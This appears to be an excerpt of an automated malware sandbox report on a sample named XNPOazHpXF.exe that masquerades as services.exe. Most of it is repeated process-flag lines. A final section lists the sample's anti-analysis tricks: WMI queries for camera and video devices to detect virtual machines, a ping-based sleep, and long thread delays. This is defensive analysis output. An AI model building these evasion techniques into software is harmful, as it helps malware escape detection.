                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                              Malware Analysis System Evasion

                              barindex
                              Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                              Source: C:\Windows\InputMethod\CHT\services.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Uses ping.exe to sleep
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeMemory allocated: 1980000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeMemory allocated: 1B870000 memory reserve | memory write watchJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeMemory allocated: 31C0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeMemory allocated: 1B1C0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeCode function: 7_2_00007FF849996398 sgdt fword ptr [eax]7_2_00007FF849996398
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 600000Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 599856Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 599000Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 598406Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 3600000Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 598047Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 597500Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 597047Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 596688Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 596437Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 596125Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 595938Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 595812Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 595562Jump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeThread delayed: delay time: 595297Jump to behavior
